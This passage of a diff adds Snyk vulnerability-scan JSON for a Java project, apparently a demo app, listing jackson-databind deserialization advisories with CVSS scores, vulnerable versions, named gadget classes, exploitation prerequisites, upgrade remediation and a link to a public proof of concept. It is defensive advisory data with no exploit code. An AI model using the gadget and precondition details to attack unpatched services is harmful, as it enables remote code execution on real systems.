"creationTime": "2020-03-26T17:09:01.709397Z", + "functions_new": [ + { + "version": [ + "[2.0.0,2.9.10.4)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2020-03-26T14:55:20Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2020-03-26T14:55:20Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:54.576513Z", + "socialTrendAlert": false, + 
"packagePopularityRank": 99, + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5", + "severityWithCritical": "high" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-561585", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:U/RC:C", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[,2.6.7.4)", + "[2.7.0,2.9.10.4)" + ] + }, + "exploit": "Proof of Concept", + "fixedIn": [ + "2.6.7.4", + "2.9.10.4" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[2.0.0,2.9.10.4)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/commit/e2ba12d5d60715d95105e3e790fc234cfb59893d", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2670", + "title": "GitHub Issue" + }, + { + "url": "https://github.com/Al1ex/CVE-2020-11113", + "title": "PoC" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.8, + "modificationTime": "2024-03-11T09:50:18.889961Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": 
"2024-03-11T09:53:47.400473Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:U/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:58:21.749219Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 8.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:50:18.889961Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:53:47.400473Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. It mishandles the interaction between serialization gadgets and typing, related to gadget `org.apache.openjpa.ee.WASRegistryManagedRuntime` (aka openjpa).\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. 
If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. 
\n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.4, 2.9.10.4 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/e2ba12d5d60715d95105e3e790fc234cfb59893d)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2670)\n- [PoC](https://github.com/Al1ex/CVE-2020-11113)\n", + "epssDetails": { + "percentile": "0.81603", + "probability": "0.00786", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-11113" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-9vvp-fxw6-jcxr" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2020-03-31T08:36:41.369827Z", + "functions_new": [ + { + "version": [ + "[2.0.0,2.9.10.4)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2020-03-31T06:16:36Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Proof of Concept", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2020-03-31T06:16:36Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:47.400473Z", + "socialTrendAlert": false, + "packagePopularityRank": 
99, + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5", + "severityWithCritical": "high" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-561586", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[,2.6.7.4)", + "[2.7.0,2.9.10.4)" + ] + }, + "exploit": "Unproven", + "fixedIn": [ + "2.6.7.4", + "2.9.10.4" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.9.10.4)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/commit/c14c9f99ed030dbd1440129585f03440c8758a99", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2664", + "title": "GitHub Issue" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.8, + "modificationTime": "2024-03-11T09:44:29.297635Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:51:14.145935Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": 
"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:58:57.628835Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 8.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:44:29.297635Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:14.145935Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. It mishandles the interaction between serialization gadgets and typing, related to gadgets `org.apache.activemq.*` (aka activemq-jms, activemq-core, activemq-pool, and activemq-pool-jms).\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. 
If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. 
\n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.4, 2.9.10.4 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/c14c9f99ed030dbd1440129585f03440c8758a99)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2664)\n", + "epssDetails": { + "percentile": "0.81603", + "probability": "0.00786", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-11111" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-v3xw-c963-f5hc" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2020-03-31T09:28:18.821103Z", + "functions_new": [ + { + "version": [ + "[,2.9.10.4)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2020-03-31T06:16:37Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2020-03-31T06:16:37Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:51:14.145935Z", + "socialTrendAlert": false, + "packagePopularityRank": 99, + "from": [ + 
"io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5", + "severityWithCritical": "high" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-561587", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[,2.6.7.4)", + "[2.7.0,2.9.10.4)" + ] + }, + "exploit": "Unproven", + "fixedIn": [ + "2.6.7.4", + "2.9.10.4" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.9.10.4)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/commit/05d7e0e13f43e12db6a51726df12c8b4d8040676", + "title": "GItHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2666", + "title": "GitHub Issue" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.8, + "modificationTime": "2024-03-11T09:44:29.301384Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:51:14.113524Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": 
"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:59:03.656527Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 8.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:44:29.301384Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:14.113524Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. It mishandles the interaction between serialization gadgets and typing, related to gadget `org.apache.commons.proxy.provider.remoting.RmiProvider` (aka apache/commons-proxy).\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. 
If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. 
\n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.4, 2.9.10.4 or higher.\n## References\n- [GItHub Commit](https://github.com/FasterXML/jackson-databind/commit/05d7e0e13f43e12db6a51726df12c8b4d8040676)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2666)\n", + "epssDetails": { + "percentile": "0.81603", + "probability": "0.00786", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-11112" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-58pp-9c76-5625" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2020-03-31T09:29:29.728517Z", + "functions_new": [ + { + "version": [ + "[,2.9.10.4)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2020-03-31T06:16:37Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2020-03-31T06:16:37Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:51:14.113524Z", + "socialTrendAlert": false, + "packagePopularityRank": 99, + "from": [ + 
"io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5", + "severityWithCritical": "high" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-564887", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "credit": [ + "Tatu Saloranta" + ], + "semver": { + "vulnerable": [ + "[,2.6.7.4)", + "[2.7.0,2.9.10.4)" + ] + }, + "exploit": "Unproven", + "fixedIn": [ + "2.6.7.4", + "2.9.10.4" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.9.10.4)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2682", + "title": "GitHub Issue" + }, + { + "url": "https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062", + "title": "Medium Post" + } + ], + "cvssDetails": [ + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:49:54.679784Z" + }, + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:50:17.073265Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": 
"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:58:57.162608Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:49:54.679784Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:50:17.073265Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. It mishandles the interaction between serialization gadgets and typing, related to `org.apache.commons.jelly.impl.Embedded` (aka `commons-jelly`).\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. 
If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. 
\n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.4, 2.9.10.4 or higher.\n## References\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2682)\n- [Medium Post](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n", + "epssDetails": { + "percentile": "0.92404", + "probability": "0.04399", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-11620" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-h4rc-386g-6m85" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2020-04-08T10:55:38.169333Z", + "functions_new": [ + { + "version": [ + "[,2.9.10.4)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2020-04-08T00:42:23Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2020-04-08T00:42:23Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:50:17.073265Z", + "socialTrendAlert": false, + "packagePopularityRank": 99, + "from": [ + 
"io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5", + "severityWithCritical": "high" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-564888", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "credit": [ + "Tatu Saloranta" + ], + "semver": { + "vulnerable": [ + "[,2.6.7.4)", + "[2.7.0,2.9.10.4)" + ] + }, + "exploit": "Unproven", + "fixedIn": [ + "2.6.7.4", + "2.9.10.4" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[2.0.0,2.9.10.4)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2680", + "title": "GitHub Issues" + }, + { + "url": "https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062", + "title": "Medium Post" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:50:17.355553Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": 